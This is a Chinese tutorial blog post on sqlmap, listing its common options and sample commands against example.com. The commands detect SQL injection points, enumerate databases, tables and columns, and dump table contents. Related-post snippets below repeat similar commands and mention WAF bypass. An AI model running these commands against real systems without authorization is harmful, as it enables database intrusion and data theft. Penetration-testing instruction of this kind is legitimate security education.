Sqlmap常用命令

已于 2024-07-03 11:10:22 修改
阅读量249 收藏 5
点赞数 4
分类专栏: 网络安全学习 文章标签: web安全 安全
于 2024-06-15 03:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pth_you/article/details/139677166
版权

SQLMap是一个自动化的SQL注入和数据库接管工具,它可以帮助安全研究人员和开发人员检测和利用SQL注入漏洞。以下是SQLMap的一些常用命令及其描述:

  1. 显示帮助信息

    • -h, --help:显示帮助消息并退出。

  2. 设置目标

    • -u URL, --url=URL:指定目标URL。
    • -d DIRECT:直接连接到数据库。
    • -l LIST:从Burp或WebScarab代理的日志中解析目标。
    • -r REQUESTFILE:从一个文件中载入HTTP请求。

  3. HTTP请求选项

    • --data=DATA:通过POST发送的数据字符串。
    • --cookie=COOKIE:HTTP Cookie头。
    • --user-agent=AGENT:指定HTTP User-Agent头。
    • --proxy=PROXY:使用HTTP代理连接到目标URL。

  4. 注入测试

    • --tables:枚举数据库的表。
    • --columns:枚举表的列(注意:此命令未在搜索结果中直接列出,但通常是SQLMap的常用功能)。
    • --dump:导出表中的数据。
    • --dbms=DBMS:指定目标数据库系统(注意:此命令未在搜索结果中直接列出,但可以通过其他选项隐式指定)。

  5. 其他选项

    • --level:设置测试等级,默认值为1,最大值为5。
    • --risk:设置测试的风险等级,默认值为1,最大值为3。
    • -v VERBOSE:设置详细级别,范围为0-6。
    • --batch:自动选择第一个有效的选项,无需用户交互。

  6. 针对特定情况的命令

    • 绕过WAF防火墙的命令,如使用tamper脚本。
    • 针对POST登录框的注入命令。
    • 使用cookie进行登录后页面的扫描。

案例:
以下是一些SQLMap的示例命令:

  1. 检测注入点

    sqlmap -u "http://example.com/page.php?id=1"

    这个命令将尝试检测给定的URL是否存在SQL注入漏洞。

  2. 列出所有数据库名称

    sqlmap -u "http://example.com/page.php?id=1" --dbs

    如果检测到注入点,这个命令将列出目标服务器上的所有数据库名称。

  3. 列出当前数据库名称

    sqlmap -u "http://example.com/page.php?id=1" --current-db

    这个命令将尝试确定当前正在使用的数据库名称。

  4. 列出指定数据库的所有表名

    sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" --tables

    将“目标数据库名”替换为实际的数据库名称,此命令将列出该数据库中的所有表名。

  5. 列出指定表的所有字段名

    sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" -T "目标表名" --columns

    将“目标数据库名”和“目标表名”替换为实际的数据库和表名称,此命令将列出该表中的所有字段名。

  6. 导出指定表的数据

    sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" -T "目标表名" --dump

    这个命令将导出指定表中的所有数据。

  7. 使用POST请求
    如果你的注入点在POST请求中,你可以使用-data参数指定POST数据,例如:

    sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234" --cookie="session_id=abc123"

    这个命令将尝试在POST请求中检测SQL注入点,并使用给定的cookie值。

  8. 设置详细级别

    sqlmap -u "http://example.com/page.php?id=1" -v 3

    这个命令将设置详细级别为3,以便你获取更多的输出信息。

Pth_you
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqlmap 常用命令
Soul Blog
11-21 982
Sqlmap 常用命令 Format sqlmap -u "required_url" parameter1, parameter2, parameter3 ... Basic parameters -dbs //all databases -tables //all tables -columns //all columns -dump //all items of columns -D [DBNAME] //specified database -T [TBLNAME] //specified
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库
sqlmap命令详解
Pitbull2014的博客
12-20 1131
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap简单使用命令
weixin_36829246的博客
03-27 326
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”...
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap使用教程及基本命令
Darkray1的博客
04-25 626
一、SQLMAP用于Access数据库注入(1) 猜解是否能注入sqlmap.py -u "http://www.xxx.com/show.asp?id=1216"(2) 猜解表python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --tables(3) 根据猜解的表进行猜解表的字段python sqlmap.py -u "http:/...
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
sqlmap常用语句
08-14
标题:"sqlmap常用语句" 描述:"sqlmap是一款强大的开源工具,用于自动化SQL注入漏洞的检测和利用。本文将深入解析sqlmap中的常用语句,帮助安全研究人员和渗透测试工程师更熟练地掌握其功能,提高漏洞挖掘效率。" ...
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
sqlmap自动化脚本
03-27
在这些脚本中,用户可能已经预设了一些常用的SQLMap参数,使得执行SQLMap扫描或攻击时更加便捷。例如,可能包括了`--threads`(线程数量)、`--level`(测试级别)、`--risk`(风险级别)、`--dbs`(枚举所有数据库...
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
BT5常用命令
08-08
详细的平时BT5渗透所用的一些常用命令,比如sqlmap,nmap,metasploit等使用
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap教程一:命令
软件测试技术的博客
07-26 3425
一、sqlmap命令介绍 sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage 摘取了其中的命令参数格式如下 中英对照版: [html] view plain copy Usage: python sqlmap.py [options]    Options(选项):
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
SQLmap命令大全
mmxhappy的专栏
01-25 1798
-delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒 --delay 0.5。--dbms=DBMS 强制后端的DBMS为此值 如:--dbms "Mysql"--proxy=PROXY 使用HTTP代理连接到目标URL --proxy。--random-agent 使用随机选定的HTTP User - Agent头。此外,您还可以运行您自己。--user-agent=AGENT 指定 HTTP User - Agent头。
Sqlmap常用命令总结
最新发布
jemus17的博客
02-26 3314
sql注入,sqlmap常用命令总结
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap常用命令
12-07
以下是sqlmap的几个常用命令: 1. 基本扫描命令:`python sqlmap.py -u <目标URL> --dbs`,用于扫描目标URL的数据库。 2. 指定cookie进行扫描:`python sqlmap.py -u <目标URL> --cookie="<cookie内容>" --dbs`,用于使用指定的cookie进行扫描。 3. 使用配置文件进行扫描:`python sqlmap.py -c sqlmap.conf`,用于使用配置文件进行扫描。 4. 指定注入点进行扫描:`python sqlmap.py -u <目标URL> --data="<POST数据>" --dbs`,用于指定POST数据中的注入点进行扫描。 5. 获取数据库信息:`python sqlmap.py -u <目标URL> -D <数据库名> --tables`,用于获取指定数据库的所有表名。 6. 获取表信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> --columns`,用于获取指定表的所有列名。 7. 获取列信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> -C <列名> --dump`,用于获取指定列的所有数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pth_you

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值